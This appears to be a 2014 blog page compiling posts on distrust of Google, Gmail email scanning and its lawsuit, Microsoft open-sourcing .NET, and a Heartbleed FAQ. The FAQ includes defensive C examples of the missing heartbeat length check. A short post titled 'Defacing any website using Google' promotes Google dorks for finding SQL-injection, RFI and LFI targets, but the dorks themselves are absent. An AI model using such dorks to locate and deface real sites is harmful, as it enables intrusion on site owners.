Wednesday, April 16, 2014

IS GOOGLE TOO BIG TO TRUST: THE CREDIBILITY GAP


Remember when we all loved Google? Its search engine was both simple to use and an unbiased portal to anything you wanted to know. It was founded by two college students at a time when Silicon Valley was a shining beacon of what was right in the world, during sunny economic and political times.

We don't love Google so much any more, mainly because we trust it less and less. I wrote an article on Google's dark side that has gotten almost all of us. More and more people have realized that the Google search engine is hugely biased in favor of advertisers, and the results are increasingly manipulated by Google for inscrutable purposes. Google seems to track anything and everything we do -- it peruses our emails, our files stored on its servers, our locations, and our chats. Americans are getting nervous.

When Google bought smart thermostat maker Nest [4] earlier this year, the public recoiled -- Nest owners didn't want their thermometers to be the latest spying portal in their homes for Google to use. That negative reaction drove home the growing Google trust problem. Likewise, no one really believed that Google wasn't participating in the NSA's spying on users; it seemed a clear case of the lady doth protest too much. Plus, we saw how much Google is spying on us, whether or not in support of the NSA. If anything, Google's response seemed to be indignation that the NSA was piggybacking on Google's own privacy-mining efforts.

For most people, Google is still a shining star. It ranks as the second-most valuable brand in the world [6], after Apple and before Coca-Cola, a ranking that has grown in recent years. It's also at the top of the rankings for best places to work [7]. It's not as if Google has yet become Facebook, whose abuse of personal information is assumed [8]. But the cracks in Google's reputation are growing.

Consider Google's recent policy update for the Google Play Store [9], which is where you get Android and Chrome OS apps. The latest policies forbid apps that mislead users into buying add-ins, releasing their personal data, or going to websites -- common techniques for dubious advertisers and vendors, as well as cyber criminals.
But will Google enforce these policies? Google didn't respond to InfoWorld's query on the matter, but its past actions suggest it will not, other than occasionally as a sort of spring cleaning [10]. Google has long had a hands-off approach to apps, doing little to weed out malware and other abusive apps. It trusted app makers to do the right thing.

Ironically, Google's own search engine would fail some of those new Play Store policies -- you can't always tell what search-result links you click are sponsored [11] versus neutral, and many of the advertised links lead to scam sites that surreptitiously steal user information. Google also plays games with the unsponsored search results, favoring content from people and organizations with active Google+ accounts, for example. Google Search and the Play Store are becoming more and more like Craigslist, the pioneering, once-virtuous online classified-ads system that now is a seedy venue favored by scammers for finding new victims.

The reality is that Google's business is and has always been about mining as much data as possible to be able to present information to users. After all, it can't display what it doesn't know. Google Search has always been an ad-supported service, so it needs a way to sell those users to advertisers -- that's how the industry works. Its Google Now voice-based service is simply a form of Google Search, so it too serves advertisers' needs.
In the digital world, advertisers want to know more than the 100,000 people who might be interested in buying a new car. They now want to know who those people are, so they can reach out to them with custom messages that are more likely to be effective. They may not know you personally, but they know your digital persona -- basically, you. Google needs to know about you to satisfy its advertisers' demands.
Once you understand that, you understand why Google does what it does. That's simply its business. Nothing is free, so if you won't pay cash, you'll have to pay with personal information. That business model has been around for decades; Google didn't invent that business model, but Google did figure out how to make it work globally, pervasively, appealingly, and nearly instantaneously.

I don't blame Google for doing that, but I blame it for being nontransparent. Putting unmarked sponsored ads in the "regular" search results section is misleading, because people have been trained by Google to see that section of the search results as neutral. They are in fact not. Once you know that, you never quite trust Google search results again. (Yes, Bing's results are similarly tainted. But Microsoft never promised to do no evil, and most people use Google.)

The issue gets trickier when you move away from search and into apps, whether Chrome OS or Android. Free apps are what people want, so app makers end up doing the same data-mining that sustains Google Search, using a shadowy network of companies [12] to do the work for them. The result is that many mobile apps have the same kind of scams you see on the Web [13]. Sometimes Google is in that mix (innocently, or at least not looking too hard), sometimes it is not. That's why opt-in permissions and clear disclosure are necessary -- so you don't feel fooled.

But many paid apps use these same services to increase their income -- you may think by paying for the app or an in-app extension, your data and behavior are not being mined. But they often are, typically without your knowledge. That's extra income for the app maker, as well as the data miners they work with. Or it supports an artificially low price that drew your interest in the first place. If a deal seems too good to be true ...
Google is hardly alone in plying this murky data-mining trade. But it's the largest visible company in that business, so it's an easy, obvious target for distrust -- and user wrath. Many of us have given up on Facebook ever being honest [14], so we're looking at Google as the next line to hold.

Also, Google was a very optimistic, idealistic company in its youth. It really did want to change the world for the better, and it believed in freeing information for all as a way to empower individuals. It believed its early "do no evil" motto. It really did see Android as a way to democratize smartphones, which until then were the province of the well-to-do who could afford BlackBerrys or iPhones. Yes, making Android freely available also created a large footprint for Google's services, so its moves were hardly selfless -- but they were oriented toward doing greater good while making money, a virtuous business approach.
Google employees still believe that's how their company works: a force for good that harmlessly uses personal data to both help individuals and make money that supports its many activities and innovations.

But as time goes on, the mercantile needs are coloring the do-gooder impulses. Google is a public company, and it has to satisfy shareholders' desire for profits every quarter. That creates a tension between its reputation and its economic reality. By sweeping that tension under the rug, Google only creates a place for distrust to grow. We can all see that the old Google is not the current Google, and the pretense that it is only heightens our suspicions.
It's time for Google to admit what it does and to act consistently on its policies (or withdraw policies it doesn't intend to enforce). That honesty will help stem the loss of trust. People know that companies exist to make money, but they need to know the true relationship they're entering and don't end up feeling misled. We all know the promises that the banks, airlines, insurance companies, cellular providers, and cable companies make aren't real, and they routinely mislead us on pricing and services -- so we don't trust them. Does Google really want to be like those industries?
Trust comes from honesty, and the key to honesty is to be forthright. Google doesn't seem to understand that yet.


THE DARK SIDE OF GOOGLE YOU NEVER KNEW: WAS IN GMAIL




I recently wrote about Google’s Street View program, and how after a series of investigations in the US and Europe, we learned that Google had used its Street View cars to carry out a covert — and certainly illegal — espionage operation on a global scale, siphoning loads of personally identifiable data from people’s Wi-Fi connections all across the world. Emails, medical records, love notes, passwords, the whole works — anything that wasn’t encrypted was fair game. It was all part of the original program design: Google had equipped its Street View cars with surveillance gear designed to intercept and vacuum up all the wireless network communication data that crossed their path. An FCC investigation showed that the company knowingly deployed Street View’s surveillance program, and then analyzed and integrated the data that it had intercepted.


“We know where you are. We know where you’ve been. We can more or less know what you’re thinking about.”
“Your digital identity will live forever… because there’s no delete button.” —Eric Schmidt

Most disturbingly, when its Street View surveillance program was uncovered by regulators, Google pulled every crisis management trick in the book to confuse investors, dodge questions, avoid scrutiny, and prevent the public from finding out the truth. The company’s behavior got so bad that the FCC fined it for obstruction of justice.

The investigation into Street View uncovered a dark side to Google. But as alarming as it was, Google’s Street View wiretapping scheme was just a tiny experimental program compared to Google’s bread and butter: a massive surveillance operation that intercepts and analyzes terabytes of global Internet traffic every day, and then uses that data to build and update complex psychological profiles on hundreds of millions of people all over the world — all of it in real time. You’ve heard about this program. You probably interact with it every day. You call it Gmail.

Google launched Gmail in 2004. It was the company’s first major “log in” service and was aimed at poaching email users from Microsoft and Yahoo. To do that, Google offered one gigabyte of free storage space standard with every account. It was an insane amount of data at the time — at least several hundred times more space than what was being offered by Yahoo or Hotmail — and people signed up en masse. Gmail’s limited pre-public release invites were so desirable that at one point they fetched over $150 on eBay.

To tech reporters Gmail’s free email service was nothing short of revolutionary. New York Times tech columnist David Pogue wrote: “One gigabyte changes everything. You no longer live in terror that somebody will send you a photo, thereby exceeding your two-megabyte limit and making all subsequent messages bounce back to their senders.”

And what about the fact that Gmail scanned your email correspondence to deliver targeted ads?

Well, what of it?

Gmail users handed over all their personal correspondence to Google, giving the company the right to scan, analyze, and retain in perpetuity their correspondence in return for a gigabyte of storage, which even at that early stage already cost Google only $2 per gigabyte per year.

Selling the contents of our private and business life to a for-profit corporation in return for half a Big Mac a year? What a steal!

You’d be hard pressed to find a bum who’d sell out to Google that cheap. But most mainstream tech journalists weren’t that scrupulous, and lined up to boost Gmail to the public.

“The only population likely not to be delighted by Gmail are those still uncomfortable with those computer-generated ads. Those people are free to ignore or even bad-mouth Gmail, but they shouldn’t try to stop Google from offering Gmail to the rest of us. We know a good thing when we see it,” wrote Pogue in 2004.

But not everyone was as excited as Mr. Pogue.

Several privacy groups, including the Electronic Privacy Information Center, were alarmed by Gmail’s vast potential for privacy abuse. In particular, EPIC was concerned that Google was not restricting its email scanning activities solely to its registered user base, but was intercepting and analyzing the private communication of anyone who emailed with a Gmail user:

“Gmail violates the privacy rights of non-subscribers. Non-subscribers who e-mail a Gmail user have ‘content extraction’ performed on their e-mail even though they have not consented to have their communications monitored, nor may they even be aware that their communications are being analyzed,” EPIC explained at the time. The organization pointed out that this practice almost certainly violates California wiretapping statutes — which expressly criminalize the interception of electronic communication without consent of all parties involved.

What spooked EPIC even more: Google was not simply scanning people’s emails for advertising keywords, but had developed underlying technology to compile sophisticated dossiers of everyone who came through its email system. All communication was subject to deep linguistic analysis; conversations were parsed for keywords, meaning and even tone; individuals were matched to real identities using contact information stored in a user’s Gmail address book; attached documents were scraped for intel — that info was then cross-referenced with previous email interactions and combined with stuff gleaned from other Google services, as well as third-party sources…

Here are some of the things that Google would use to construct its profiles, gleaned from two patents the company filed prior to launching its Gmail service:

    Concepts and topics discussed in email, as well as email attachments
    The content of websites that users have visited
    Demographic information — including income, sex, race, marital status
    Geographic information
    Psychographic information — personality type, values, attitudes, interests and lifestyle interests
    Previous searches users have made
    Information about documents a user viewed and/or edited
    Browsing activity
    Previous purchases

To EPIC, Google’s interception and use of such detailed personal information was clearly a violation of California law, and the organization called on California’s Attorney General to investigate Google’s Gmail service. The Attorney General promised to look into the matter, but nothing much happened.

Meanwhile, Gmail’s user base continued to rocket. As of this month, there are something like 425 million active users around the world using email services. Individuals, schools, universities, companies, government employees, non-profits — and it’s not just Gmail anymore.

After its runaway success with Gmail, Google aggressively expanded its online presence, buying up smaller tech companies and deploying a staggering number of services and apps. In just a few years, Google had suddenly become ubiquitous, inserting themselves into almost every aspect of our lives: We search through Google, browse the Web through Google, write in Google, store our files in Google and use Google to drive and take public transport. Hell, even our mobile phones run on Google.

All these services might appear disparate and unconnected. To the uninitiated, Google’s offering of free services — from email, to amazing mobile maps, to a powerful replacement for Microsoft Office — might seem like charity. Why give away this stuff for free? But to think that way is to miss the fundamental purpose that Google serves and why it can generate nearly $20 billion in profits a year.

The Google services and apps that we interact with on a daily basis aren’t the company’s main product: They are the harvesting machines that dig up and process the stuff that Google really sells: for-profit intelligence.

Google isn’t a traditional Internet service company. It isn’t even an advertising company. Google is a whole new type of beast: a global advertising-intelligence company that tries to funnel as much user activity in the real and online world through its services in order to track, analyze and profile us: it tracks as much of our daily lives as possible — who we are, what we do, what we like, where we go, who we talk to, what we think about, what we’re interested in — all those things are seized, packaged, commodified and sold on the market — at this point, most of the business comes from matching the right ad to the right eyeballs. But who knows how the massive database Google’s compiling on all of us will be used in the future.

No wonder that when Google first rolled out Gmail in 2004, cofounder Larry Page refused to rule out that the company would ever combine people’s search and browsing history with their Gmail account profiles: “It might be really useful for us to know that information. I’d hate to rule anything like that out.” Indeed it was. Profitable, too.

It’s been almost a decade since Google launched its Gmail service, but the fundamental questions about the legality of the company’s surveillance operations first posed by EPIC have not been resolved.

Indeed, a class action lawsuit currently winding its way through the California federal court system shows that we’ve not moved an inch.

The complaint — a consolidation of six separate class action lawsuits that had been filed against Google in California, Florida, Illinois, Maryland and Pennsylvania — accuses Google of illegally intercepting, reading and profiting off people’s private correspondence without compensation. The lawsuit directly challenges Google’s legal right to indiscriminately vacuum up people’s data without clear consent, and just might be the biggest threat Google has ever faced.

Here’s how the New York Times described the case:

    Wiretapping is typically the stuff of spy dramas and shady criminal escapades. But now, one of the world’s biggest Web companies, Google, must defend itself against accusations that it is illegally wiretapping in the course of its everyday business — gathering data about Internet users and showing them related ads.

    …The Gmail case involves Google’s practice of automatically scanning e-mail messages and showing ads based on the contents of the e-mails. The plaintiffs include voluntary Gmail users, people who have to use Gmail as part of an educational institution and non-Gmail users whose messages were received by a Gmail user. They say the scanning of the messages violates state and federal antiwiretapping laws.

Google has aggressively fought the lawsuit. It first convinced a judge to put it under seal — which redacted most of the complaint and made it unavailable to public scrutiny — and then made a series of disingenuous arguments in an attempt to get the lawsuit preemptively dismissed. Google’s attorneys didn’t dispute its for-profit surveillance activities. What they claimed was that intercepting and analyzing electronic communication, and using that information to build sophisticated psychological profiles, was no different than scanning emails for viruses or spam. And then they made a stunning admission, arguing that as far as Google saw it, people who used Internet services for communication had “no legitimate expectation of privacy” — and thus anyone who emailed with Gmail users had given “implied consent” for Google to intercept and analyze their email exchange.

No expectation of privacy? Implied consent for surveillance?

Google’s claims were transparently disingenuous, and Judge Lucy Koh rejected them out of hand and allowed the lawsuit to proceed.

Unfortunately, it’s difficult to comment on or analyze the contents of the class action lawsuit filed against Google, as the company redacted just about all of it. One thing is clear: the complaint goes beyond simple wiretapping and brings into question an even bigger concern: Who owns the digital personal information about our lives — our thoughts, ideas, interactions, personal secrets, preferences, desires and hopes? And can all these things be seized bit by bit, analyzed, packaged, commodified and then bought and sold on the market like any other good? Can Google do that? What rights do we have over our inner lives? It’s scary and crazy. Especially when you think of kids born today: Their entire lives will be digitally surveilled, recorded, analyzed, stored somewhere and then passed around from company to company. What happens to that information?

What happens to all this data in the future should be of serious concern. Not only because, with the right warrant (or in many cases without) the data is available to law enforcement. But also because in the unregulated hands of Google, our aggregated psychological profiles are an extremely valuable asset that could end up used for almost anything.

EPIC points out that Google reserves the right to “transfer all of the information, including any profiles created, if and when it is merged or sold.” How do we know that information won’t end up in some private background check database that’ll be available to your boss? How do we know this information won’t be hacked or stolen and won’t fall into the hands of scammers and repressive dictators?

The answer is: We don’t. And these tech companies would rather keep us in the dark and not caring.

Google’s corporate leadership understands that increased privacy regulations could torpedo its entire business model and the company takes quite a lot of space on its SEC filing disclosing the dangers to its investors:

    Privacy concerns relating to elements of our technology could damage our reputation and deter current and potential users from using our products and services…

    We also face risks from legislation that could be passed in the future. For example, there is a risk that state legislatures will attempt to regulate the automated scanning of email messages in ways that interfere with our Gmail free advertising-supported web mail service. Any such legislation could make it more difficult for us to operate or could prohibit the aspects of our Gmail service that uses computers to match advertisements to the content of a user’s email message when email messages are viewed using the service. This could prevent us from implementing the Gmail service in any affected states and impair our ability to compete in the email services market…

Former Google CEO Eric Schmidt has not been shy about his company’s views on Internet privacy: People don’t have any, nor should they expect it. “If you have something that you don’t want anyone to know, maybe you shouldn’t be doing it in the first place,” he infamously told CNBC in 2009. And he’s right. Because true Internet privacy and real surveillance reform would be the end of Google.

And not just Google, but nearly every major consumer Silicon Valley company — all of them feed on people’s personal data one way or another and depend on for-profit surveillance for survival.

Which brings me to Silicon Valley’s “Reform Government Surveillance” project.

The fact that the biggest, most data-hungry companies in Silicon Valley joined up in a cynical effort to shift attention away from their own for-profit surveillance operations and blame it all on big bad government is to be expected. What’s surprising is just how many supposed journalists and so-called privacy advocates fell for it.

Yasha Levine is a roving correspondent at Pando Daily. Visit his website at yashalevine.com.

Friday, April 11, 2014

MICROSOFT LAUNCHES FREE OPEN SOURCE OS AND RELEASES SOURCE CODE FOR .NET

Microsoft hasn't been very open, but under the new management of CEO Satya Nadella, the company might be heading in an open direction, like Google's open source
This was taken from CNET NEWS, MICROSOFT'S JOURNEY TO AN OPEN SOURCE .NET

Microsoft's decision to open-source more of its .Net platform didn't happen overnight, or even in the past few weeks. It was a move years in the making.
Microsoft's move to open source key chunks of its .Net platform, a software framework that developers can use to build Windows applications, was one of the biggest announcements at Microsoft's Build 2014 show last week.
I've seen a number of Microsoft watchers and users postulating that this move is proof that newly minted CEO Satya Nadella is taking the company in directions that former CEO Steve Ballmer and his leadership team never would have dared go. That's a nice, neat story. But it just isn't true.
(Ditto with the decision to roll out Office for the iPad before "Gemini" touch-first Office for Windows. Word is that decision also predated Nadella's appointment as CEO.)

Soma Somasegar, the corporate vice president of Microsoft's Developer Division, told me during an interview at Build 2014 last week that the work around open-sourcing more of .Net began three years ago.
Somasegar said management was aware that Microsoft hadn't embraced open source in needed ways. The thinking was that Microsoft should start out by open-sourcing higher levels of the .Net Framework at first, and then consider gradually moving down the stack. But there were debates about whether Microsoft should actually take contributions from the community, as is expected under most, if not all, open-source licenses -- or simply make the code available for viewing but not modification.
Mobile-tool maker Xamarin, with whom Microsoft was partnering (rather than fighting/fearing, as some inside the company did initially) was a key advisor, Somasegar said. Some inside Microsoft were initially leery of Xamarin's goal to help .Net developers write apps that worked on Android and iOS because those platforms competed with Windows. But over time, Microsoft became more friend than foe to Xamarin -- so much so that rumors are continuing to swirl that Microsoft may be negotiating to buy Xamarin. (At Build last week, neither Microsoft nor Xamarin officials would confirm or quash those rumors.)
Xamarin officials never pressured Microsoft to open-source .Net, Somasegar said. However, they did "influence us around getting the community involved," he said. Xamarin did want more information about .Net interfaces and related documentation, Somasegar acknowledged.
Among the .Net technologies that Microsoft is open-sourcing is its "Roslyn" compiler, which is the foundation for future versions of Visual Basic and C#. Microsoft's announcement last week means all future iterations of these compilers will be open-sourced under an Apache 2.0 license.
A year ago, Somasegar said he began talking with Microsoft Distinguished Engineer and Roslyn lead Anders Hejlsberg about whether and when Microsoft should make Roslyn available as open source. In the fall of 2013, the decision was made to open-source Roslyn once it was in preview/end-user shape (which happened last week) and to accept contributions from the community, Somasegar said. Somasegar championed the idea of creating a separate foundation, the .Net Foundation, dedicated to overseeing the new open-sourcing effort.
Somasegar said he spoke to Nadella a year ago, when he was still heading up Microsoft's Server and Tools business (prior to becoming CEO) about the Developer Division's interest in making more of .Net open source.
"He (Nadella) said back then, if you think this is good for devs, go do it," Somasegar said.
Scott Guthrie, who is now the executive vice president in charge of Microsoft's Cloud and Enterprise business, also was a key proponent of the idea from way back, Somasegar confirmed.

So will Microsoft take the next step and open-source the core of .Net, including the Base Class Libraries (BCL) and Common Language Runtime (CLR)?

"We are taking it one step at a time," said Somasegar. "If it's truly beneficial for us and for the community," Microsoft will consider it, Somasegar said. But there has to be a proven need, he emphasized. For example, Microsoft provided Xamarin with the BCL documentation late last week given that company's proven need for it.

I have to admit that I wasn't sure if Microsoft's decision to open-source more of .Net would be met by cheers or jeers by those attending Build last week. I was curious if developers might see the move as an indicator that Microsoft no longer considered .Net valuable enough to keep in-house as part of its collection of crown jewels. Most of the devs with whom I spoke at the show seemed upbeat about the move, however.

Hejlsberg told attendees of a press panel during Build that Microsoft is not abandoning .Net.
"We are actively investing in .Net going forward," Hejlsberg said, in response to an audience question as to whether Microsoft was putting .Net on the back burner.
"It's not going away," Hejlsberg said. "We are all in on .Net."

SSL/TLS COMPROMISED HOW TO FIX OPEN SOURCE OPENSSL HEARTBLEED BUG

Recently a bug was found in the popular cryptographic software library OpenSSL.
This information was taken from the official documentation on Heartbleed.com.

The Heartbleed Bug

The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users.

What leaks in practice?

We have tested some of our own services from an attacker's perspective. We attacked ourselves from outside, without leaving a trace. Without using any privileged information or credentials we were able to steal from ourselves the secret keys used for our X.509 certificates, user names and passwords, instant messages, emails and business critical documents and communication.

How to stop the leak?

As long as the vulnerable version of OpenSSL is in use it can be abused. Fixed OpenSSL has been released and now it has to be deployed. Operating system vendors and distribution, appliance vendors, independent software vendors have to adopt the fix and notify their users. Service providers and users have to install the fix as it becomes available for the operating systems, networked appliances and software they use.

Q&A

What is the CVE-2014-0160?

CVE-2014-0160 is the official reference to this bug. CVE (Common Vulnerabilities and Exposures) is the Standard for Information Security Vulnerability Names maintained by MITRE. Due to co-incident discovery a duplicate CVE, CVE-2014-0346, which was assigned to us, should not be used, since others independently went public with the CVE-2014-0160 identifier.

To test whether your server is affected by the bug, run the test here, or visit the repo.

Why it is called the Heartbleed Bug?

The bug is in OpenSSL's implementation of the TLS/DTLS (transport layer security protocols) heartbeat extension (RFC 6520). When it is exploited it leads to the leak of memory contents from the server to the client and from the client to the server.
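The bounds check whose absence causes this kind of leak, as an added example (not OpenSSL's code and not from Heartbleed.com): a receiver for the RFC 6520 heartbeat message that silently discards any request whose claimed payload length does not fit the bytes actually received. The function names, the constructed sample messages and the zero-filled response padding are assumptions made for the example; RFC 6520 calls for random padding.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HB_REQUEST  1   /* heartbeat_request  (RFC 6520) */
#define HB_RESPONSE 2   /* heartbeat_response (RFC 6520) */
#define HB_HEADER   3   /* 1 byte type + 2 byte payload_length */
#define HB_MIN_PAD  16  /* RFC 6520: padding is at least 16 bytes */

/* Constructed sample: well-formed request, 4-byte payload "ping", 16 bytes padding. */
static const uint8_t SAMPLE_OK[HB_HEADER + 4 + HB_MIN_PAD] =
    { HB_REQUEST, 0x00, 0x04, 'p', 'i', 'n', 'g' };

/* Constructed sample: claims 0x4000 payload bytes but carries only one. */
static const uint8_t SAMPLE_BAD[HB_HEADER + 1 + HB_MIN_PAD] =
    { HB_REQUEST, 0x40, 0x00, 'x' };

/* Scratch buffer for responses (hypothetical helper for the example). */
static uint8_t demo_out[64];

/*
 * Build a heartbeat response for a received heartbeat message.
 * Returns the response length, 0 if the message must be silently
 * discarded, or -1 if the output buffer is too small.
 */
long hb_build_response(const uint8_t *rec, size_t rec_len,
                       uint8_t *out, size_t out_cap)
{
    if (rec == NULL || out == NULL)
        return 0;
    /* Too short to hold the header plus minimum padding: discard. */
    if (rec_len < HB_HEADER + HB_MIN_PAD)
        return 0;
    if (rec[0] != HB_REQUEST)
        return 0;

    size_t claimed = ((size_t)rec[1] << 8) | rec[2];

    /* The decisive check: the claimed payload length must fit inside
     * the bytes that were actually received. Without it, the copy
     * below would read whatever sits in memory after the message. */
    if (claimed > rec_len - HB_HEADER - HB_MIN_PAD)
        return 0;

    size_t resp_len = HB_HEADER + claimed + HB_MIN_PAD;
    if (resp_len > out_cap)
        return -1;

    out[0] = HB_RESPONSE;
    out[1] = rec[1];
    out[2] = rec[2];
    memcpy(out + HB_HEADER, rec + HB_HEADER, claimed);
    /* Assumption for a deterministic example: zero padding.
     * A real implementation fills this with random bytes. */
    memset(out + HB_HEADER + claimed, 0, HB_MIN_PAD);
    return (long)resp_len;
}

/*
 * How many bytes past the end of the received message a copy that
 * trusted payload_length would read. Pure arithmetic, no memory access
 * beyond the header; 0 means the claimed length is within the message.
 */
size_t hb_overread_bytes(const uint8_t *rec, size_t rec_len)
{
    if (rec == NULL || rec_len < HB_HEADER)
        return 0;
    size_t claimed = ((size_t)rec[1] << 8) | rec[2];
    size_t end = HB_HEADER + claimed;
    return end > rec_len ? end - rec_len : 0;
}

int main(void)
{
    long ok = hb_build_response(SAMPLE_OK, sizeof SAMPLE_OK,
                                demo_out, sizeof demo_out);
    long bad = hb_build_response(SAMPLE_BAD, sizeof SAMPLE_BAD,
                                 demo_out, sizeof demo_out);
    printf("well-formed request: response of %ld bytes\n", ok);
    printf("oversized claim:     result %ld (discarded)\n", bad);
    printf("an unchecked copy would have read %zu bytes past the message\n",
           hb_overread_bytes(SAMPLE_BAD, sizeof SAMPLE_BAD));
    return 0;
}
```

The same arithmetic in `hb_overread_bytes` can be applied to captured heartbeat messages to flag requests whose claimed length exceeds what was sent.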

What makes the Heartbleed Bug unique?

Bugs in a single piece of software or a library come and go and are fixed by new versions. However, this bug has left a large amount of private keys and other secrets exposed to the Internet. Considering the long exposure, the ease of exploitation and the fact that attacks leave no trace, this exposure should be taken seriously.

Is this a design flaw in the SSL/TLS protocol specification?

No. This is an implementation problem, i.e. a programming mistake in the popular OpenSSL library that provides cryptographic services such as SSL/TLS to applications and services.
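The kind of length check this programming mistake left out, as an added C example (not OpenSSL's code and not part of the original FAQ): per RFC 6520 a heartbeat message declares its own payload length, and the receiver must compare that declaration with the bytes that actually arrived before echoing the payload. The function names, status codes and sample records are constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* RFC 6520 HeartbeatMessage layout:
 *   type (1 byte) | payload_length (2 bytes, big-endian) | payload | padding (>= 16 bytes) */
#define HB_REQUEST     1
#define HB_RESPONSE    2
#define HB_HEADER_LEN  3
#define HB_MIN_PADDING 16

/* Hypothetical status codes for this example. */
enum hb_status { HB_OK, HB_TRUNCATED, HB_LENGTH_LIE, HB_NOT_REQUEST, HB_NO_SPACE };

/* Validate a received heartbeat record before any payload byte is used.
 * rec_len is the number of bytes that actually arrived in the record. */
enum hb_status hb_validate(const uint8_t *rec, size_t rec_len, size_t *payload_len)
{
    size_t declared;

    if (rec_len < HB_HEADER_LEN + HB_MIN_PADDING)
        return HB_TRUNCATED;                 /* cannot even hold header + padding */
    declared = ((size_t)rec[1] << 8) | rec[2];
    /* The check whose absence caused Heartbleed: the sender-declared length
     * must fit inside what was received, otherwise the record is discarded. */
    if (HB_HEADER_LEN + declared + HB_MIN_PADDING > rec_len)
        return HB_LENGTH_LIE;
    if (rec[0] != HB_REQUEST)
        return HB_NOT_REQUEST;
    if (payload_len)
        *payload_len = declared;
    return HB_OK;
}

/* Build the heartbeat response only after validation, so memcpy can never
 * read past the end of the received record. */
enum hb_status hb_build_response(const uint8_t *rec, size_t rec_len,
                                 uint8_t *out, size_t out_cap, size_t *out_len)
{
    size_t plen = 0, need;
    enum hb_status st = hb_validate(rec, rec_len, &plen);

    if (st != HB_OK)
        return st;
    need = HB_HEADER_LEN + plen + HB_MIN_PADDING;
    if (need > out_cap)
        return HB_NO_SPACE;
    out[0] = HB_RESPONSE;
    out[1] = (uint8_t)(plen >> 8);
    out[2] = (uint8_t)(plen & 0xff);
    memcpy(out + HB_HEADER_LEN, rec + HB_HEADER_LEN, plen);
    /* Zero padding keeps the example deterministic; RFC 6520 asks for random padding. */
    memset(out + HB_HEADER_LEN + plen, 0, HB_MIN_PADDING);
    *out_len = need;
    return HB_OK;
}

/* Constructed sample: 5-byte payload "hello", declared length 5, 16 padding bytes. */
static const uint8_t SAMPLE_HONEST[HB_HEADER_LEN + 5 + HB_MIN_PADDING] =
    { HB_REQUEST, 0x00, 0x05, 'h', 'e', 'l', 'l', 'o' };

/* Constructed sample: 1-byte payload, but the header declares 0x4000 bytes. */
static const uint8_t SAMPLE_LYING[HB_HEADER_LEN + 1 + HB_MIN_PADDING] =
    { HB_REQUEST, 0x40, 0x00, 'x' };

/* Returns the response size in bytes, or 0 if the record was rejected. */
size_t demo_response_len(const uint8_t *rec, size_t rec_len)
{
    uint8_t out[64];
    size_t n = 0;

    if (hb_build_response(rec, rec_len, out, sizeof out, &n) != HB_OK)
        return 0;
    return n;
}

int main(void)
{
    printf("honest request: status %d, response %zu bytes\n",
           (int)hb_validate(SAMPLE_HONEST, sizeof SAMPLE_HONEST, NULL),
           demo_response_len(SAMPLE_HONEST, sizeof SAMPLE_HONEST));
    printf("lying request:  status %d, response %zu bytes\n",
           (int)hb_validate(SAMPLE_LYING, sizeof SAMPLE_LYING, NULL),
           demo_response_len(SAMPLE_LYING, sizeof SAMPLE_LYING));
    return 0;
}
```

A request rejected with `HB_LENGTH_LIE` is also a useful detection signal, since a well-behaved peer never declares more payload than it sends.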

What is being leaked?

Encryption is used to protect secrets that may harm your privacy or security if they leak. In order to coordinate recovery from this bug we have classified the compromised secrets into four categories: 1) primary key material, 2) secondary key material, 3) protected content and 4) collateral.

What is leaked primary key material and how to recover?

These are the crown jewels, the encryption keys themselves. Leaked secret keys allow the attacker to decrypt any past and future traffic to the protected services and to impersonate the service at will. Any protection given by the encryption and the signatures in the X.509 certificates can be bypassed. Recovery from this leak requires patching the vulnerability, revoking the compromised keys, and reissuing and redistributing new keys. Even doing all this will still leave any traffic intercepted by the attacker in the past vulnerable to decryption. All this has to be done by the owners of the services.

What is leaked secondary key material and how to recover?

These are, for example, the user credentials (user names and passwords) used in the vulnerable services. Recovery from this leak requires the owners of the service first to restore trust in the service according to the steps described above. After this, users can start changing their passwords and possible encryption keys according to the instructions from the owners of the services that have been compromised. All session keys and session cookies should be invalidated and considered compromised.

What is leaked protected content and how to recover?

This is the actual content handled by the vulnerable services. It may be personal or financial details, private communication such as emails or instant messages, documents or anything seen worth protecting by encryption. Only the owners of the services will be able to estimate the likelihood of what has been leaked, and they should notify their users accordingly. The most important thing is to restore trust in the primary and secondary key material as described above. Only this enables safe use of the compromised services in the future.

What is leaked collateral and how to recover?

Leaked collateral are other details that have been exposed to the attacker in the leaked memory content. These may contain technical details such as memory addresses and security measures such as canaries used to protect against overflow attacks. These have only contemporary value and will lose their value to the attacker once OpenSSL has been upgraded to a fixed version.

Recovery sounds laborious, is there a shortcut?

After seeing what we saw by "attacking" ourselves, with ease, we decided to take this very seriously. We have gone laboriously through patching our own critical services and are in the process of dealing with possible compromise of our primary and secondary key material. All this just in case we were not the first ones to discover this and this could have been exploited in the wild already.

How do revocation and reissuing of certificates work in practice?

If you are a service provider you have signed your certificates with a Certificate Authority (CA). You need to check with your CA how compromised keys can be revoked and new certificates reissued for the new keys. Some CAs do this for free, some may charge a fee.

Visit heartbleed for more information.

Saturday, March 22, 2014

DEFACING ANY WEBSITE USING GOOGLE

HERE ARE JUST A FEW GOOGLE DORKS THAT CAN BE USED FOR SQL INJECTIONS
THIS POST IS NOT FOR NEWBIES ON THE INTERNET, ONLY FOR THOSE WHO UNDERSTAND WHAT SQL INJECTIONS ARE AND HOW THEY ARE USED.

After line 6, add this at the end.
You can then find a vulnerable site, and you are ready for SQL injection.
PHP DORK
ASP DORK
SQL DORK
RFI AND LFI
RFI
LFI

THE BEST HACKING BOOKS YOU MUST READ TO BECOME A HACKER

Hacking is considered to be a two-way tool wherein a computer system is penetrated either to make it more secure or to create mischief. Ethical hacking is defined as making use of programming skills to penetrate a computer system and determine its vulnerabilities. Ethical hackers are skilled computer experts, often called the “white hats”. Unlike non-ethical hackers or “black hats”, who penetrate a computer system and exploit it for their own personal gain or mischief, the “white hats” evaluate and point out the vulnerabilities of system software, and suggest system changes to make it less penetrable.
